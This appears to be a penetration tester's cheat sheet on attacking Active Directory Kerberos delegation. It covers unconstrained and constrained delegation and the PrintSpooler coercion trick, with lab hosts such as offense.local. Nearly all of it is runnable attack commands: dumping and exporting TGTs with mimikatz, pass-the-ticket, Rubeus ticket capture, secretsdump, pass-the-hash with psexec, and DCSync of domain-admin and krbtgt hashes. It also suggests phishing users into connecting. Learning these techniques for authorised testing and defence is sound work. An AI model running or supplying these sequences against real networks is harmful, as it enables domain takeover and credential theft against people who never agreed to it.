Kerberos
Kerberosting
Check the Imported Ticket
klistafter that you can test it with ls
ls \\<target machine>\c$
# to list file in the target machine with imported ticket.Unconstrained Delegation
User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server
Any user authentication (i.e CIFS) to the computer with unconstrained delegation enabled on it, will cache that user's TGT in memory, which can later be dumped and reused by an adversary.
use tool -> powerview.ps1
Get-DomainComputer -Unconstrained
# search for useraccountcontrol : TRUSTED_FOR_DELEGATION
# name : IIS01 (target where saving the TGT in memory)
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,descriptionExploit:
# require administrator
mimikatz
mimikatz# privilege::debug
mimikatz# sekurlsa::tickets
We could wait for user to connect with IIS01 or do phishing attack to force user connect to IIS01.
Then check mimikatz again for TGT in the memory:
After we got OFFENSE.LOCAL/administrator, mean we got the administrator for entire domain.
run this command to export the TGT.
mimikatz::tickets /export
Then import the ticket with mimikatz
kerberos::ptt [0;3c785]-2-0-40e10000-Administrator@krbtgt-OFFENSE.LOCAL.kirbilogin with PSExec or PSSession
PsExec.exe \\dc01 cmd
Enter-PSSession dc01Note:
# check the imported TGT
klistReference:
Constrained Delegation
. .\PowerView.ps1
Get-DomainUser -TrustedToAuth
Get-NetUser -TrustedToAuth
# test this first
Get-DomainComputer -TrustedToAuth
note:
cn (common name) -> current computer name
msds-allowedtodelegateto -> target computer
useraccountcontrol -> TRUSTED_TO_AUTH_FOR_DELEGATION
example: IIS01 allows to contrained delegation to FILE_01
cn : IIS01
msds-allowedtodelegateto : {cifs/file_01.example.local, cifs/file_01}
useraccountcontrol : TRUSTED_TO_AUTH_FOR_DELEGATIONExploit on the computer that has trusted_to_auth_for_delegation
Rubeus.exe tgtdeleg /nowrapWhen get the Base64 rubeus ticket.
# Import Ticket to Kali Linux
# make sure the base64 file is one line.
base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/home/kali/ticket.ccachecrackmapexec smb <target hostname> -k
secretdump.py <domain>/<hostname>\$@<hostname>.<domain> -dc-ip <target ip dc> -no-pass -k
# last step when we have the ntlm hash
psexec.py -hashes <hash>:<hash> administrator@<hostname>Note:
When access kerberost things, make sure your clock screw is good.
sudo ntpdate -u <ip server that has ntp server>DC PrintSpooler
Our environment for this lab is:
ws01 - attacker compromised host with kerberos delegation enabled (attacker, server)
dc01 - domain controller running a print service (victim, target)
check with this
ls \\DC01\pipe\spoolss
dir \\DCO1\pipe\spoolssBefore attack (administrator cmd in breached computer ws01 )
Rubeus.exe monitor /interval:4 /filteruser:DC01$Then run SpoolSample.exe (cmd.exe) in IIS01
# SpoolSample.exe <target server> <capture server>
SpoolSample.exe DC01 ws01
# return TGTRubeus could also import the TGT directly to memory:
Rubeus.exe ptt /ticket:<base64 TGT from rubeus>We indeed got a TGT for DC01$ computer!
With this, we can make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user offense\spotless which we know has high privileges in the domain:
# in this case spotless is domain admin user.
mimikatz # lsadump::dcsync /domain:offense.local /user:spotless
mimikatz # lsadump::dcsync /domain:offense.local /user:krbtgt
reference:
Last updated